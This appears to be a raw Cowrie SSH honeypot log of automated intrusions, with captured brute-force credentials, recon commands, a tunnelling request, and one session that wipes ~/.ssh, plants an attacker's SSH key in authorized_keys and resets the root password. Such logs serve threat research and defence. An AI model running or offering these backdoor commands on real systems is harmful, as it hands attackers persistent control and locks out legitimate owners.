{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-08-26T18:35:54.976366Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:35:55.214483Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.session.closed","duration":"24.1","message":"Connection lost after 24.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:35:55.215793Z","src_ip":"212.227.235.229","session":"328cba4f1bf9"}
{"eventid":"cowrie.session.closed","duration":30.762331008911133,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:35:57.120199Z","src_ip":"114.35.197.70","session":"a012dd28c76a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34902,"dst_ip":"1.2.3.4","dst_port":22,"session":"d116c31d528d","protocol":"ssh","message":"New connection: 212.227.235.229:34902 (1.2.3.4:22) [session: d116c31d528d]","sensor":"my-vps","timestamp":"2025-08-26T18:36:01.090066Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:36:01.091316Z","src_ip":"212.227.235.229","session":"d116c31d528d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:36:01.321422Z","src_ip":"212.227.235.229","session":"d116c31d528d"}
{"eventid":"cowrie.login.failed","username":"ftp_user","password":"test","message":"login attempt [ftp_user/test] failed","sensor":"my-vps","timestamp":"2025-08-26T18:36:02.245972Z","src_ip":"212.227.235.229","session":"d116c31d528d"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:36:03.480119Z","src_ip":"212.227.235.229","session":"d116c31d528d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":21856,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ad7c1c7583a","protocol":"ssh","message":"New connection: 212.227.125.160:21856 (1.2.3.4:22) [session: 1ad7c1c7583a]","sensor":"my-vps","timestamp":"2025-08-26T18:37:42.359959Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T18:37:42.710610Z","src_ip":"212.227.125.160","session":"1ad7c1c7583a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T18:37:42.711471Z","src_ip":"212.227.125.160","session":"1ad7c1c7583a"}
{"eventid":"cowrie.login.success","username":"root","password":"Password147","message":"login attempt [root/Password147] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:37:44.332961Z","src_ip":"212.227.125.160","session":"1ad7c1c7583a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:37:45.016361Z","src_ip":"212.227.125.160","session":"1ad7c1c7583a"}
{"eventid":"cowrie.command.input","input":"ls -la /","message":"CMD: ls -la /","sensor":"my-vps","timestamp":"2025-08-26T18:37:45.017025Z","src_ip":"212.227.125.160","session":"1ad7c1c7583a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","size":1347,"shasum":"352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:37:45.252084Z","src_ip":"212.227.125.160","session":"1ad7c1c7583a"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:37:45.387992Z","src_ip":"212.227.125.160","session":"1ad7c1c7583a"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":65208,"dst_ip":"1.2.3.4","dst_port":22,"session":"fcd7ad497610","protocol":"ssh","message":"New connection: 217.72.205.35:65208 (1.2.3.4:22) [session: fcd7ad497610]","sensor":"my-vps","timestamp":"2025-08-26T18:38:40.784924Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:38:40.786029Z","src_ip":"217.72.205.35","session":"fcd7ad497610"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":2508,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a4c4547ff20","protocol":"ssh","message":"New connection: 212.227.235.229:2508 (1.2.3.4:22) [session: 8a4c4547ff20]","sensor":"my-vps","timestamp":"2025-08-26T18:38:42.944924Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:38:42.946510Z","src_ip":"212.227.235.229","session":"8a4c4547ff20"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":2799,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b654ed156a3","protocol":"ssh","message":"New connection: 212.227.235.229:2799 (1.2.3.4:22) [session: 2b654ed156a3]","sensor":"my-vps","timestamp":"2025-08-26T18:38:43.133687Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T18:38:43.134730Z","src_ip":"212.227.235.229","session":"2b654ed156a3"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T18:38:43.293446Z","src_ip":"212.227.235.229","session":"2b654ed156a3"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:38:43.771304Z","src_ip":"212.227.235.229","session":"2b654ed156a3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T18:38:43.931518Z","session":"2b654ed156a3"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":32784,"dst_ip":"1.2.3.4","dst_port":22,"session":"af959d84f901","protocol":"ssh","message":"New connection: 45.88.8.215:32784 (1.2.3.4:22) [session: af959d84f901]","sensor":"my-vps","timestamp":"2025-08-26T18:38:59.341917Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T18:38:59.656818Z","src_ip":"45.88.8.215","session":"af959d84f901"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T18:38:59.657531Z","src_ip":"45.88.8.215","session":"af959d84f901"}
{"eventid":"cowrie.login.success","username":"root","password":"Nipun@123","message":"login attempt [root/Nipun@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:39:02.496981Z","src_ip":"45.88.8.215","session":"af959d84f901"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:39:03.276589Z","src_ip":"45.88.8.215","session":"af959d84f901"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50696,"dst_ip":"1.2.3.4","dst_port":22,"session":"b4f6174676b9","protocol":"ssh","message":"New connection: 212.227.235.229:50696 (1.2.3.4:22) [session: b4f6174676b9]","sensor":"my-vps","timestamp":"2025-08-26T18:39:38.682584Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:39:38.683492Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:39:38.916988Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.login.success","username":"root","password":"admin_123","message":"login attempt [root/admin_123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:39:39.893880Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:39:40.386040Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T18:39:40.387149Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T18:39:40.388765Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:39:40.625253Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:39:41.209105Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T18:39:41.209766Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T18:39:41.445788Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:39:41.446930Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50712,"dst_ip":"1.2.3.4","dst_port":22,"session":"d80b25872df2","protocol":"ssh","message":"New connection: 212.227.235.229:50712 (1.2.3.4:22) [session: d80b25872df2]","sensor":"my-vps","timestamp":"2025-08-26T18:39:41.682743Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:39:41.683704Z","src_ip":"212.227.235.229","session":"d80b25872df2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:39:41.919683Z","src_ip":"212.227.235.229","session":"d80b25872df2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T18:39:42.907541Z","src_ip":"212.227.235.229","session":"d80b25872df2"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:39:44.146897Z","src_ip":"212.227.235.229","session":"d80b25872df2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36800,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b02efa48e98","protocol":"ssh","message":"New connection: 212.227.235.229:36800 (1.2.3.4:22) [session: 9b02efa48e98]","sensor":"my-vps","timestamp":"2025-08-26T18:39:49.497326Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:39:49.498604Z","src_ip":"212.227.235.229","session":"9b02efa48e98"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:39:49.734435Z","src_ip":"212.227.235.229","session":"9b02efa48e98"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:39:50.145523Z","src_ip":"212.227.235.229","session":"9b02efa48e98"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:39:50.445955Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T18:39:50.446795Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:39:50.682909Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:39:51.170099Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
{"eventid":"cowrie.command.input","input":"echo \"root:DovOlC2Z8fr6\"|chpasswd|bash","message":"CMD: echo \"root:DovOlC2Z8fr6\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-08-26T18:39:51.170927Z","src_ip":"212.227.235.229","session":"b4f6174676b9"}
